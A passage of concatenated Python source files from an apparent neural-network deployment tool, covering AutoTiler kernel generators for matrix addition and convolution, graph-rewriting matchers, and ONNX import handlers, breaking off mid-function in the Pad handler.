self.at_act_params = at_act_params
self.cname = cname
self.node_name = matrixadd_params.name
self.at_ver = at_ver
def code(self, code_block=None):
if code_block is None:
code_block = CodeBlock()
code_block.comment("generator for {}", self.node_name)
if not self.gen_ctrl.is_unmodified:
self.gen_ctrl.gen_ctrl_decl(code_block)
gen_at_matrixadd(code_block, self.cname, self.in_q1, self.in_q2, self.out_q,
self.in_dim, self.out_dim, self.at_matrixadd_params,
at_ver=self.at_ver, gen_ctrl=self.gen_ctrl)
return code_block
def insert_axis(shape, make_len):
if len(shape) > make_len:
raise ValueError(f'shape {shape} exceeds maximum length {make_len}')
return tuple(([1] * (make_len - len(shape))) + shape)
class MatrixAddDynKernel(NewAutoTilerKernel):
CALL_TEMPLATE = '''
// generator for {node_name}
CNN_MatAddDynAdjust("{cname}", {gen_ctrl}, {at_bits(in_q1)}, {at_bits(in_q2)}, {at_bits(out_q)},
{in_q1.q}, {in_q2.q}, {out_q.q}, 1, 1, 1,
{in_shape[0]}, {out_shape[0]},
{in_shape[1]}, {in_shape[2]}, KOP_MATADD_DYNADJUST);
'''
def __init__(self, cname, params, matrixadd_q, act_params, act_q, gen_ctrl=None, at_ver=3):
if gen_ctrl is None:
gen_ctrl = GenCtrl(None, cname=cname)
else:
gen_ctrl.cname = cname
in_shape1 = insert_axis(params.in_dims[0].shape, 3)
in_shape2 = insert_axis(params.in_dims[1].shape, 3)
out_shape = insert_axis(params.out_dims[0].shape, 3)
if in_shape1 != in_shape2 or in_shape1 != out_shape:
raise ValueError(f'CNN_MatAddDynAdjust has been selected for {params.name} but '
f'has shape {in_shape1} {in_shape2} -> {out_shape}')
in_q1 = matrixadd_q.in_qs[0]
in_q2 = matrixadd_q.in_qs[1]
out_q = matrixadd_q.out_qs[0]
if act_params is not None:
raise ValueError(f'CNN_MatAddDynAdjust has been selected for {params.name} but '
f'it has a fused activation which is not compatible')
attrs = {
'in_q1': in_q1,
'in_q2': in_q2,
'out_q': out_q,
'in_shape': in_shape1,
'out_shape': out_shape
}
extra_attrs = {
'cname': cname,
'node_name': params.name
}
super().__init__(attrs, extra_attrs, gen_ctrl=gen_ctrl)
```
#### File: new_generators/float/padded_matadd_float.py
```python
import logging
from generation.at_types.at_params import NO_ACTIVATION, gen_activation_op
from generation.at_types.gen_ctrl import GenCtrl
from generation.bindings import (CommentBindingList, GNodeArgEdge,
NodeBindingList)
from generation.new_generators.mult8.matadd_mult8 import make_three_dims
from generation.generators.kernels.autotiler_kernel import NewAutoTilerKernel
from generation.new_generators.generator_base import (GeneratorBase, ktype,
paramstype)
from graph.types import MatrixAddParameters, PaddedAddFusionParameters
from utils.node_id import NodeId
LOG = logging.getLogger("nntool." + __name__)
@paramstype(PaddedAddFusionParameters)
@ktype("float")
class PaddedMatAddFloatGenerator(GeneratorBase):
@classmethod
def globals_generator(cls, gen, node, qrec, pnode, fnode) -> bool:
return True
@classmethod
def bindings_generator(cls, gen, node, qrec, in_eparams, out_eparams, cname) -> bool:
step_idx = node.step_idx
cnodes = node.contained_nodes()
quants = [gen.G.quantization[NodeId(node, fnode)] for fnode in cnodes]
add_node = [node for node in cnodes if isinstance(
node, MatrixAddParameters)]
if add_node:
quants = [gen.G.quantization[NodeId(
node, fnode)] for fnode in cnodes]
gen.bindings.append(
CommentBindingList("Node {} in1q {} in2q {} outq {}", cname,
quants[1].in_qs[0], quants[1].in_qs[1], quants[-1].out_qs[0])
)
gen.bindings.append(
NodeBindingList(cname,
GNodeArgEdge(in_eparams[0]),
GNodeArgEdge(in_eparams[1]),
GNodeArgEdge(out_eparams[0], "GNA_OUT")
))
return True
@classmethod
def kernel_generator(cls, gen, node, qrec, in_eparams, out_eparams, cname) -> bool:
cnodes = node.contained_nodes()
if len(cnodes) > 2:
act_node = cnodes[2]
else:
act_node = None
pad_node = cnodes[0]
gen.kernels.append(PaddedMatAddKernelFloat(node.name, cname, node, pad_node, act_node, at_ver=gen.opts['at_ver'], force_relu=gen.force_relu))
return True
class PaddedMatAddKernelFloat(NewAutoTilerKernel):
CALL_TEMPLATE = """
// generator for {node_name}
CNN_MatAddPaddedAct_fp16("{cname}", {gen_ctrl}, {feat}, {width}, {height}, {padtop}, {padbot}, {padded_idx}, KOP_MATADD, {act_oper});
"""
def __init__(self, node_name, cname, matrixadd_params, pad_params, act_params, at_ver=3, gen_ctrl=None, force_relu=True):
if gen_ctrl is None:
gen_ctrl = GenCtrl(None, cname=cname)
else:
gen_ctrl.cname = cname
if act_params is not None:
at_act_params = gen_activation_op(act_params.activation, force_relu=force_relu)
else:
at_act_params = NO_ACTIVATION
padtop = pad_params.padding[0][0]
padbot = pad_params.padding[0][1]
padded_idx = 0 if matrixadd_params.in_dims[0].size() > matrixadd_params.in_dims[1].size() else 1
dimensions0 = make_three_dims(matrixadd_params.in_dims[0])
dimensions1 = make_three_dims(matrixadd_params.in_dims[1])
attrs = {
'feat': max(dimensions0[0], dimensions1[0]),
'width': dimensions0[1],
'height': dimensions0[2],
'padded_idx': padded_idx,
'padtop': padtop,
'padbot': padbot,
'act_oper': at_act_params
}
extra_attrs = {
'cname': cname,
'node_name': node_name
}
super().__init__(attrs, extra_attrs, gen_ctrl=gen_ctrl)
```
#### File: new_generators/mult8/conv_pool_mult8.py
```python
from graph.dim import PadDim
from graph.types.pooling import PoolingParameters
from quantization.multiplicative.scaling_qtypes import MultMulBiasScaleQType
from generation.new_generators.helpers.act_infos import gen_act_infos
from generation.helpers.gen_scales import gen_scales
from generation.at_types.at_params import NO_POOL, gen_activation_op, gen_conv_at_params, gen_pool_at_params
import logging
from utils.node_id import NodeId
import numpy as np
from generation.at_types.constant_info import ConstantInfo
from generation.at_types.gen_ctrl import GenCtrl
from generation.at_types.tc_arg_info import GlobalArgInfo
from generation.bindings import (CommentBindingList, GNodeArgEdge,
GNodeArgNode, NodeBindingList)
from generation.generators.globals.global_names import INFOS, MULSCALE, MULSHIFT
from generation.generators.kernels.autotiler_kernel import NewAutoTilerKernel
from generation.helpers.gen_constant import gen_constant
from generation.new_generators.generator_base import (GeneratorBase,
paramstype, ktype)
from graph.types import Conv2DParameters, ConvFusionParameters
from quantization.qtype import QType
LOG = logging.getLogger("nntool." + __name__)
def verify_scalar(arr):
return [item.item() if isinstance(item, np.ndarray) else item for item in arr]
@paramstype(Conv2DParameters, ConvFusionParameters)
@ktype('scaled')
class ConvActGenerator(GeneratorBase):
@classmethod
def globals_generator(cls, gen, node, qrec, pnode, fnode) -> bool:
if isinstance(pnode, Conv2DParameters):
gen_scales(gen, pnode, pnode, qrec)
infos, infos_comment = np.array([0, 0, 0, 0, 0]), "no activation"
filt_q = qrec
fnode = pnode
elif isinstance(pnode, ConvFusionParameters) and isinstance(fnode, Conv2DParameters):
cnodes = pnode.contained_nodes()
quants = [gen.G.quantization[NodeId(pnode, fnode)] for fnode in cnodes]
filt_q = quants[0]
gen_scales(gen, pnode, cnodes[0], quants[0])
if pnode.fusion_type in ("conv_active_pool", "conv_active"):
infos, infos_comment = gen_act_infos(cnodes[1], quants[1])
elif pnode.fusion_type == "conv_pool_active":
infos, infos_comment = gen_act_infos(cnodes[2], quants[2])
elif pnode.fusion_type == "conv_pool":
infos, infos_comment = np.array([0, 0, 0, 0, 0]), "no activation"
else:
return False
infos = np.append(infos, [0, 0, 0, 0])
comment = str.format("BiasQ: {}", 0) + infos_comment
infos[5] = 0 # BiasQ
if filt_q.cache.get('ne16'):
conv_mul_bias = filt_q.cache.get('mul_biases_q')
prenorm = conv_mul_bias.pre_normalization if isinstance(conv_mul_bias, MultMulBiasScaleQType) else 0
pad_value = np.array(filt_q.in_qs[0].zero_point).astype(np.int16)
pad_value1 = np.bitwise_and(pad_value, 0xFF)
pad_value2 = np.bitwise_and(pad_value, 0xFF00) >> 8
w_offset = -np.array(filt_q.in_qs[1].zero_point).astype(np.int32)
w_offset1 = np.bitwise_and(w_offset, 0xFF)
w_offset2 = np.bitwise_and(w_offset, 0xFF00) >> 8
w_offset3 = np.bitwise_and(w_offset, 0xFF0000) >> 16
w_offset4 = np.bitwise_and(w_offset, 0xFF000000) >> 24
infos = np.append(
infos, verify_scalar([prenorm if prenorm else 0, pad_value1, pad_value2, w_offset1, w_offset2, w_offset3, w_offset4]))
cname, file_name = gen_constant(gen, pnode, fnode, INFOS)
const_info = ConstantInfo(file_name, QType.Pow2(bits=8, q=0, signed=True), contents=infos)
gen.globals.append(GlobalArgInfo("int8", cname,
gen.opts['default_global_home_location'],
gen.opts['default_global_exec_location'],
const_info=const_info,
comment=comment))
return True
@classmethod
def bindings_generator(cls, gen, node, qrec, in_eparams, out_eparams, cname) -> bool:
step_idx = node.step_idx
if isinstance(node, Conv2DParameters):
set_conv_bindings(gen, step_idx, in_eparams, out_eparams, cname, node, qrec)
elif isinstance(node, ConvFusionParameters):
cnodes = node.contained_nodes()
quants = [gen.G.quantization[NodeId(node, fnode)] for fnode in cnodes]
if node.fusion_type in ("conv_active_pool", "conv_active", "conv_pool"):
set_conv_bindings(gen, step_idx, in_eparams, out_eparams,
cname, cnodes[0], quants[0], out_q=quants[1])
elif node.fusion_type == "conv_pool_active":
set_conv_bindings(gen, step_idx, in_eparams, out_eparams,
cname, cnodes[0], quants[0], out_q=quants[2])
else:
return False
else:
return False
return True
@classmethod
def kernel_generator(cls, gen, node, qrec, in_eparams, out_eparams, cname) -> bool:
if isinstance(node, Conv2DParameters):
conv_kernel = ConvPoolReluKernelNE16 if qrec.cache.get("ne16") else ConvPoolReluKernelSQ8
gen.kernels.append(conv_kernel(node.name, cname, node, qrec, None, None, None, None,
force_relu=gen.force_relu, gen_ctrl=node.get_gen_ctrl()))
elif isinstance(node, ConvFusionParameters):
cnodes = node.contained_nodes()
quants = [gen.G.quantization[NodeId(node, fnode)] for fnode in cnodes]
conv_kernel = ConvPoolReluKernelNE16 if quants[0].cache.get("ne16") else ConvPoolReluKernelSQ8
if node.fusion_type == "conv_active_pool":
gen.kernels.append(conv_kernel(node.name, cname, cnodes[0], quants[0], cnodes[2], quants[2], cnodes[1], quants[1],
force_relu=gen.force_relu, gen_ctrl=node.get_gen_ctrl()))
elif node.fusion_type == "conv_pool_active":
gen.kernels.append(conv_kernel(node.name, cname, cnodes[0], quants[0], cnodes[1], quants[1], cnodes[2], quants[2],
force_relu=gen.force_relu, gen_ctrl=node.get_gen_ctrl()))
elif node.fusion_type == "conv_active":
gen.kernels.append(conv_kernel(node.name, cname, cnodes[0], quants[0], None, None, cnodes[1], quants[1],
force_relu=gen.force_relu, gen_ctrl=node.get_gen_ctrl()))
elif node.fusion_type == "conv_pool":
gen.kernels.append(conv_kernel(node.name, cname, cnodes[0], quants[0], cnodes[1], quants[1], None, None,
force_relu=gen.force_relu, gen_ctrl=node.get_gen_ctrl()))
else:
return False
return True
def set_conv_bindings(gen, step_idx, in_eparams, out_eparams, cname,
conv_params, conv_q, out_q=None):
del step_idx
if out_q is None:
out_q = conv_q
gen.bindings.append(
CommentBindingList("Node {} inq {} weightsq {} outq {} biasesq {}", cname,
conv_q.in_qs[0], conv_q.in_qs[1], out_q.out_qs[0], conv_q.in_qs[2])
)
gen.bindings.append(
NodeBindingList(cname, GNodeArgEdge(in_eparams[0]),
GNodeArgEdge(in_eparams[1]),
GNodeArgEdge(in_eparams[2]),
GNodeArgEdge(out_eparams[0], "GNA_OUT"),
GNodeArgNode(conv_params, MULSCALE),
GNodeArgNode(conv_params, MULSHIFT),
GNodeArgNode(conv_params, INFOS)
))
class ConvPoolReluKernel(NewAutoTilerKernel):
def __init__(self, node_name, cname, conv_params, conv_q, pool_params, pool_q, act_params, act_q, force_relu, gen_ctrl=None):
if gen_ctrl is None:
self.gen_ctrl = gen_ctrl = GenCtrl(None, cname=cname)
else:
gen_ctrl.cname = cname
self.gen_ctrl = gen_ctrl
is_ne16 = conv_q.cache.get('ne16')
hwc = False
if not is_ne16 and conv_params.ker_in_order and conv_params.ker_in_order[0] == ["h", "w", "c"]:
hwc = True
gen_ctrl.hwc = 1
if not is_ne16 and not hwc and conv_params.filter.h == 1 and conv_params.filter.w == 1 and gen_ctrl.enableim2col is None:
gen_ctrl.enableim2col = 1
in_q = filter_q = out_q = bias_q = None
in_dim = out_dim = None
pad_compatibilities = []
at_conv_params = gen_conv_at_params(
conv_params, pad_compatibilities)
in_dim = conv_params.in_dims[0]
out_dim = conv_params.out_dims[0]
filter_q = conv_q.in_qs[1]
in_q = conv_q.in_qs[0]
out_q = conv_q.out_qs[0]
bias_q = conv_q.in_qs[2]
pad_val = in_q.zero_point[0]
if pool_params is not None:
at_pool_params = gen_pool_at_params(
pool_params, pad_compatibilities)
out_dim = pool_params.out_dims[0]
out_q = pool_q.out_qs[0]
else:
at_pool_params = NO_POOL
if act_params is not None:
act_op = gen_activation_op(
act_params.activation, force_relu=force_relu, asymmetric=act_q.in_qs[0].zero_point != 0)
if out_dim is None:
out_dim = act_params.out_dims[0].expand_to_chw()
out_q = act_q.out_qs[0]
else:
act_op = "KOP_NONE"
if pad_compatibilities:
reduction = PadDim.pad_compatibility_reduce(*pad_compatibilities,
"convolution padding is not compatible with pool padding")
if not reduction[2]: # default is balanced pad left
at_pad_ctrl = next(i for i, v in enumerate(reduction) if v)
LOG.debug("%s: generating pad control block", node_name)
self.gen_ctrl.PadType = at_pad_ctrl
attrs = {
'in_size': in_q.dtype_bits//8 if in_q.signed else -in_q.dtype_bits//8,
'out_size': out_q.dtype_bits//8 if out_q.signed else -out_q.dtype_bits//8,
'bias_size': bias_q.dtype_bits//8,
'filter_bits': filter_q.bits,
'in_feat': in_dim.c,
'out_feat': out_dim.c,
'in_width': in_dim.w,
'in_height': in_dim.h,
'kop_conv': at_conv_params.ConvOper,
'fcx': at_conv_params.Fcx,
'fcy': at_conv_params.Fcy,
'dcx': at_conv_params.Dcx,
'dcy': at_conv_params.Dcy,
'scx': at_conv_params.Scx,
'scy': at_conv_params.Scy,
'conv_pad': at_conv_params.ConvPad,
'pad_value': pad_val,
'kop_pool': at_pool_params.PoolOper,
'fpx': at_pool_params.Fpx,
'fpy': at_pool_params.Fpy,
'dpx': at_pool_params.Dpx,
'dpy': at_pool_params.Dpy,
'spx': at_pool_params.Spx,
'spy': at_pool_params.Spy,
'pool_pad': at_pool_params.PoolPad,
'kop_act': act_op
}
extra_attrs = {
'cname': cname,
'node_name': node_name
}
super().__init__(attrs, extra_attrs, gen_ctrl=gen_ctrl)
class ConvPoolReluKernelNE16(ConvPoolReluKernel):
CALL_TEMPLATE = """// generator for {node_name}
CNN_ConvolutionNE16("{cname}", {gen_ctrl},
{in_size}, {out_size}, {bias_size}, 1, {filter_bits},
{in_feat}, {out_feat}, {in_width}, {in_height},
{kop_conv}, {fcx}, {fcy}, {dcx}, {dcy}, {scx}, {scy}, {conv_pad}, {pad_value},
{kop_pool}, {fpx}, {fpy}, {dpx}, {dpy}, {spx}, {spy}, {pool_pad},
{kop_act});
"""
class ConvPoolReluKernelSQ8(ConvPoolReluKernel):
CALL_TEMPLATE = """// generator for {node_name}
CNN_ConvolutionPoolAct_SQ8("{cname}", {gen_ctrl}, {bias_size}, 1,
{in_feat}, {out_feat}, {in_width}, {in_height},
{kop_conv}, {fcx}, {fcy}, {dcx}, {dcy}, {scx}, {scy}, {conv_pad},
{kop_pool}, {fpx}, {fpy}, {dpx}, {dpy}, {spx}, {spy}, {pool_pad},
{kop_act});
"""
```
#### File: manipulations/adjusts/pool.py
```python
import logging
from graph.types import (ActivationFusion, AveragePoolParameters,
MaxPoolParameters, PoolingParameters)
from ..adjust_base import AdjusterBase, handles
LOG = logging.getLogger("nntool." + __name__)
@handles(MaxPoolParameters, AveragePoolParameters)
class PoolAdjuster(AdjusterBase):
def adjust(self, G, node):
modified = False
# check that the transposed input 0 matches autotiler order
names = node.in_dims[0].order
if names != node.ker_in_order[0]:
self.adjust_in_out_order(G, node, names, node.ker_in_order[0])
modified = True
return modified
@handles(ActivationFusion)
class PoolFusionAdjuster(AdjusterBase):
def adjust(self, G, node):
modified = False
fusion_node = node
pool_node = next(iter([node for node in fusion_node.contained_nodes() if isinstance(node, PoolingParameters)]), None)
if pool_node is None:
return modified
# check that the transposed input 0 matches autotiler order
names = pool_node.in_dims[0].order
if names != pool_node.ker_in_order[0]:
self.adjust_in_out_order(G, pool_node, names, pool_node.ker_in_order[0], fusion=fusion_node)
modified = True
return modified
```
#### File: matches/matchers/combine_concats.py
```python
import logging
from graph.dim import Dim
from graph.types import (ConcatParameters, CopyParameters, InputParameters,
NNEdge, ReshapeParameters, Parameters)
from utils.graph import GraphView, Node
from utils.node_id import NodeId
from ..matcher import (Matcher, description, groups, match_name,
modifies_dimensions, needs_valid_dimension, run_before)
LOG = logging.getLogger("nntool." + __name__)
class DummyInput(Parameters):
def __init__(self, name: str, edge):
super().__init__(name)
self.edge = edge
def traverse_to_concat(G, edge, subgraph, edge_path=None):
if edge_path is None:
edge_path = []
node = edge.from_node
if isinstance(node, ConcatParameters):
if node.axis != 0 or len(G.out_edges(node)) > 1:
return []
find_concats_up(G, node, subgraph)
return edge_path + [edge]
elif isinstance(node, (CopyParameters, ReshapeParameters)):
if len(G.out_edges(node)) > 1:
return []
in_edge = G.in_edges(node)[0]
return traverse_to_concat(G, in_edge, subgraph, edge_path=edge_path + [edge])
else:
return []
def find_concats_up(G, concat, subgraph: GraphView = None):
# Produces a subgraph of concats operating on axis 0 separated by copys or reshapes.
# the output node will be the final concat. the input nodes will be all the inputs
# to a condensed concat that can replace this subgraph.
if subgraph is None:
subgraph = GraphView()
edge_path = []
for edge in G.indexed_in_edges(concat.name):
edge_path = traverse_to_concat(G, edge, subgraph)
if edge_path:
for inter_edge in edge_path:
subgraph.add_edge(inter_edge)
else:
subgraph.add_edge(
NNEdge(
from_node=DummyInput(f"{edge.from_node.name}_{edge.from_idx}", edge),
to_node=edge.to_node,
to_idx=edge.to_idx
)
)
return subgraph
# def find_concats_up(G, node, subgraph: GraphView = None, edge_path=None):
# # Produces a subgraph of concats operating on axis 0 separated by copys or reshapes.
# # the output node will be the final concat. the input nodes will be all the inputs
# # to a condensed concat that can replace this subgraph.
# if subgraph is None:
# subgraph = GraphView()
# edge_path = []
# for edge in G.indexed_in_edges(node.name):
# if isinstance(edge.from_node, ConcatParameters):
# if len(G.out_edges(edge.from_node.name)) > 1 or edge.from_node.axis != 0:
# continue
# edge_path.append(edge)
# for traversed_edge in edge_path:
# subgraph.add_edge(traversed_edge.clone())
# find_concats_up(G, edge.from_node, subgraph=subgraph, edge_path=[])
# elif isinstance(edge.from_node, (CopyParameters, ReshapeParameters)):
# if len(G.out_edges(edge.from_node.name)) > 1:
# continue
# find_concats_up(G, edge.from_node, subgraph=subgraph,
# edge_path=edge_path + [edge])
# return subgraph
def remove_internal_graph(G, subgraph):
in_nodes = subgraph.inputs()
concat_node = subgraph.outputs()[0]
for in_node in in_nodes:
if G.edge_in_graph(in_node.edge):
G.remove_edge(in_node.edge)
nodes = {in_node.edge.to_node}
while nodes:
node = nodes.pop()
if node == concat_node:
continue
nodes |= set(edge.to_node for edge in subgraph.out_edges(node))
if node in G:
G.remove(node)
nid = NodeId(node)
if G.quantization and nid in G.quantization:
del G.quantization[nid]
@ match_name("combine_concats")
@ description("Combine concats on 0 axis together")
@ run_before('insert_copies')
@ groups('*')
@ needs_valid_dimension(True)
@ modifies_dimensions(True)
class CombineConcats(Matcher):
def _match(self, G: GraphView, set_identity: bool = True, **kwargs):
modified_graph = False
concats = set(G.nodes(node_classes=ConcatParameters))
while concats:
concat = concats.pop()
if concat.axis != 0:
continue
subgraph = find_concats_up(G, concat)
found = set(subgraph.nodes(node_classes=ConcatParameters))
if len(found) <= 1:
continue
LOG.info(
f"Combining concats {','.join([node.name for node in found])}")
modified_graph = True
concats -= found
in_edges = [inp.edge for inp in subgraph.inputs()]
in_dims = [
edge.from_node.out_dims[edge.from_idx] for edge in in_edges
]
nodes_to_remove = [node for node in subgraph.nodes() if node != concat and not isinstance(node, DummyInput)]
for edge in in_edges:
G.remove_edge(edge)
for node in nodes_to_remove:
if node.name in G:
G.remove(node)
nid = NodeId(node)
if G.quantization and nid in G.quantization:
del G.quantization[nid]
# remove_internal_graph(G, subgraph)
out_dim = concat.out_dims[0]
in_qs = []
for idx, edge in enumerate(in_edges):
from_node = edge.from_node
from_idx = edge.from_idx
if len(in_dims[idx]) > 1:
reshape = ReshapeParameters(
G.unique_name(f'{concat.name}_flat{idx}'),
old_shape=in_dims[idx],
shape=Dim.unnamed([in_dims[idx].size()]))
G.add_edge(
NNEdge(
from_node=from_node, from_idx=from_idx,
to_node=reshape))
from_node = reshape
from_idx = 0
G.add_edge(
NNEdge(
from_node=from_node, from_idx=from_idx,
to_node=concat, to_idx=idx))
if in_qs is not None and G.quantization:
nid = NodeId(edge.from_node)
if nid in G.quantization:
qrec = G.quantization[nid]
in_qs.append(qrec.out_qs[edge.from_idx])
else:
in_qs = None
else:
in_qs = None
if in_qs is not None and G.quantization:
nid = NodeId(concat)
if nid in G.quantization:
G.quantization[nid].in_qs = in_qs
reshape = ReshapeParameters(
G.unique_name(f'{concat.name}_expand'),
old_shape=Dim.unnamed([out_dim.size()]),
shape=out_dim)
G.insert_node_after(concat, reshape, edge_class=NNEdge)
if set_identity:
self.set_identity(G)
return modified_graph
```
#### File: matches/matchers/duplicate_constants.py
```python
import logging
from graph.dim import Dim
from graph.types import ConstantInputParameters, NNEdge
from utils.graph import GraphView
from ..matcher import Matcher, match_name, description, run_before, groups
LOG = logging.getLogger("nntool." + __name__)
@match_name("match_duplicate_constants")
@description("""Find constants that are linked to more than one node and duplicate them""")
@run_before('*')
@groups('symmetric', 'scaled')
class MatchDuplicateConstants(Matcher):
def _match(self, G: GraphView, set_identity: bool = True, **kwargs):
has_modified = False
for node in G.nodes(node_classes=ConstantInputParameters):
out_edges = G.out_edges(node.name)
if len(out_edges) <= 1:
continue
has_modified = True
LOG.info('node %s has more than one out edge and will be duplicated', node.name)
idx = 1
for out_edge in out_edges[1::]:
new_constant = ConstantInputParameters(
f'{node.name}_{idx}', dims=Dim.unnamed(node.dims.shape),
value=node.value.copy())
G.remove_edge(out_edge)
G.add_edge(NNEdge(from_node=new_constant, to_node=out_edge.to_node, to_idx=out_edge.to_idx))
idx += 1
if set_identity:
self.set_identity(G)
return has_modified
```
#### File: matches/matchers/remove_slice.py
```python
import logging
from graph.types import NNEdge
from graph.types.others import ReshapeParameters, StridedSliceParameters
from utils.graph import GraphView
from utils.node_id import NodeId
from ..matcher import Matcher, match_name, description, run_before, groups
LOG = logging.getLogger("nntool." + __name__)
@match_name("remove_slice")
@description("Removes slices that are doing nothing and may insert a reshape if necessary.")
@run_before('*')
@groups('symmetric', 'scaled')
class RemoveSlice(Matcher):
def _match(self, G: GraphView, set_identity: bool = True, **kwargs) -> bool:
has_modified_graph = False
for node in [node for node in G.nodes(node_classes=StridedSliceParameters)]:
if node.slice_shape != tuple(node.in_dims[0].shape):
continue
has_modified_graph = True
nid = NodeId(node)
if node.slice_shape == node.out_shape:
LOG.info(f'removing strided slice {node.name} that does nothing')
G.remove_and_reconnect(node, edge_class=NNEdge)
if G.quantization and nid in G.quantization:
del G.quantization[nid]
else:
reshape = ReshapeParameters(G.unique_name(f'{node.name}_reshape'), old_shape=node.slice_shape, shape=node.out_shape)
LOG.info(f'replacing strided slice {node.name} with reshape {reshape.name}')
G.replace_node(node, reshape)
if G.quantization and nid in G.quantization:
G.quantization[NodeId(reshape)] = G.quantization[nid]
del G.quantization[nid]
if set_identity:
self.set_identity(G)
return has_modified_graph
```
#### File: graph/matches/matches.py
```python
import logging
from graph.matches.matcher import Matcher, MatchGroup
from utils.subclasses import get_all_subclasses
from .matchers import *
LOG = logging.getLogger("nntool." + __name__)
def general_validation(match: Matcher):
if match.DESCRIPTION is None:
LOG.warning('matcher %s has no description', match.NAME)
if match.NAME is None:
raise ValueError(f'match {match.NAME} has no name')
if '*' in match.RUN_BEFORE and '*' in match.RUN_AFTER:
raise ValueError(
f'match {match.NAME} has wildcard in run_before and run_after')
return match
ALL_MATCHERS = [general_validation(match_class) for match_class in get_all_subclasses(Matcher)
if match_class.NAME is not None]
def select_matchers(group=None):
return [match_class for match_class in ALL_MATCHERS
if (group is None or '*' in match_class.GROUPS or group in match_class.GROUPS)]
def order_matchers(matchers):
first_matchers = [match for match in matchers if '*' in match.RUN_BEFORE]
last_matchers = [match for match in matchers if '*' in match.RUN_AFTER]
rest = [match for match in matchers if match not in first_matchers +
last_matchers]
rest_sorted = []
while rest:
matcher = rest.pop(0)
pos = 0
for omatch in rest_sorted:
if matcher.NAME in omatch.RUN_AFTER:
break
if omatch.NAME in matcher.RUN_BEFORE:
break
pos += 1
rest_sorted.insert(pos, matcher)
return first_matchers + rest_sorted + last_matchers
def select_sorted_matchers(group=None):
return order_matchers(select_matchers(group=group))
def select_sorted_matcher_instances(group=None):
return [matcher() for matcher in select_sorted_matchers(group=group)]
def get_fusions():
return sorted(
[(match_class.NAME, match_class.DESCRIPTION)
for match_class in ALL_MATCHERS],
key=lambda x: x[0])
def get_pow2_match_group():
return MatchGroup(
*select_sorted_matcher_instances(group='symmetric'),
identity="pow2_match_group"
)
def get_scale8_match_group():
return MatchGroup(
*select_sorted_matcher_instances(group='scaled'),
identity="std_match_group"
)
def get_fusion(name):
if name in ["pow2_match_group"]:
return get_pow2_match_group()
if name in ["std_match_group", "scale8_match_group"]:
return get_scale8_match_group()
match_class = next((match_class for match_class in select_matchers()
if match_class.NAME == name), None)
if match_class is not None:
return match_class()
return None
```
#### File: graph/types/utils.py
```python
def summarize_stats(stats):
summary = {'mean': 0, 'std': 0, 'amin': float("Infinity"),\
'amax':float('-Infinity'), 'lmin': float("-Infinity"),\
'lmax':float('Infinity'), 'min': 0, 'max': 0,\
'range': float("-Infinity")}
for v in stats:
for k in ['mean', 'std', 'min', 'max']:
summary[k] += v[k]
summary['amin'] = min(summary['amin'], v['min'])
summary['amax'] = max(summary['amax'], v['max'])
summary['lmin'] = max(summary['lmin'], v['min'])
summary['lmax'] = min(summary['lmax'], v['max'])
summary['range'] = max(summary['range'], v['range'])
for k in ['mean', 'std', 'min', 'max']:
summary[k] /= len(stats)
for v in stats:
v['precision'] = v['range']/summary['range']
return summary
```
#### File: importer/common/handler_options.py
```python
class HandlerOptions():
HANDLER_OPTIONS = []
@staticmethod
def handler_option(name, val_type=str, default="", desc="description missing", shortcut=None):
def deco(cls):
# check if this class actually defines HANDLER_OPTIONS
if 'HANDLER_OPTIONS' not in cls.__dict__:
value = []
setattr(cls, 'HANDLER_OPTIONS', value)
else:
value = getattr(cls, 'HANDLER_OPTIONS')
value.append({'name': name, 'val_type': val_type, 'default': default,
'desc': desc, 'shortcut': shortcut})
return cls
return deco
@classmethod
def get_all_handler_options(cls):
options = {}
for subclass in cls.__subclasses__():
for option in getattr(subclass, 'HANDLER_OPTIONS'):
options[option['name']] = option
return options
@classmethod
def get_default_handler_options(cls):
options = {}
for subclass in cls.__subclasses__():
for option in getattr(subclass, 'HANDLER_OPTIONS'):
options[option['name']] = option['default']
return options
#pylint: disable=invalid-name
handler_option = HandlerOptions.handler_option
```
#### File: handlers/backend/dequantize_linear.py
```python
import numpy as np
from importer.common.constant_mixin import ConstantMixin
from quantization.qtype import QType
from ..backend_handler import BackendHandler
from ..handler import onnx_op
@onnx_op("DequantizeLinear")
class DequantizeLinear(ConstantMixin, BackendHandler):
@classmethod
def _common(cls, node, **kwargs):
all_nodes = kwargs['all_nodes']
inputs = [all_nodes[inp] for inp in node.input]
axis = node.attrs.get('axis', None)
x = inputs[0]
scale = inputs[1]
zero_point = inputs[2] if len(inputs) > 2 else None
qtype = QType(
dtype=zero_point[0].value.dtype, scale=scale[0].value,
zero_point=zero_point[0].value, quantized_dimension=axis)
all_nodes[node.input[0]] = tuple(list(x)[0:3] + [qtype])
all_nodes[node.output[0]] = tuple(list(x)[0:3] + [None])
return x[0]
@classmethod
def version_10(cls, node, **kwargs):
return cls._common(node, **kwargs)
@classmethod
def version_13(cls, node, **kwargs):
return cls._common(node, **kwargs)
```
#### File: handlers/backend/pad.py
```python
import numpy as np
from graph.types import ConstantInputParameters, NNEdge
from graph.types.others import NoOPParameters, PadParameters
from importer.common.constant_mixin import ConstantMixin
from importer.common.provisional_dim import ProvisionalDim
from importer.onnx.common import logger
from ..backend_handler import BackendHandler
from ..handler import onnx_op, partial_support, ps_description
@onnx_op("Pad")
@partial_support(True)
@ps_description("Only constant pad amounts are supported."
"Only 2D padding is supported. Padding must be successfully fused into a "
"convolution or pooling operation to generate successfully. There is currently "
"no AutoTiler Pad generator.")
class Pad(ConstantMixin, BackendHandler):
@classmethod
def _common(cls, node, mode='constant', pads=None, constant_value=0, **kwargs):
all_nodes = kwargs['all_nodes']
G = kwargs['G']
valid_name = kwargs['valid_name']
inputs = [all_nodes[inp] for inp in node.input]
x = inputs[0]
x_shape = x[2].shape
ndim = len(x_shape)
npad = len(pads)//2
if npad != ndim:
if all(not pad for pad in pads):
logger.warning(f'Pad {valid_name} has {npad} pad values and {ndim} input rank. '
'Since pad is zero this is ignored but it probably indicates a bug in the ONNX graph.')
else:
raise ValueError(
f'Eroor in ONNX graph - pad {valid_name} has {npad} pad values and {ndim} input rank.')
apads = np.array([[pads[idx], pads[idx+ndim]] for idx in range(ndim)])
# apads = np.array(pads).reshape((-1, 2))
if cls.is_constant(x):
logger.info("reducing %s to a constant", valid_name)
val = cls.get_constant(x)
if mode == 'constant':
val = np.pad(val, apads, mode=mode,
constant_values=constant_value)
else:
val = np.pad(val, apads, mode=mode)
params = ConstantInputParameters(valid_name, value=val)
pshape = [
dim + sum(apads[idx]) if dim is not None else None for idx, dim in enumerate(x_shape)]
all_nodes[node.output[0]] = (
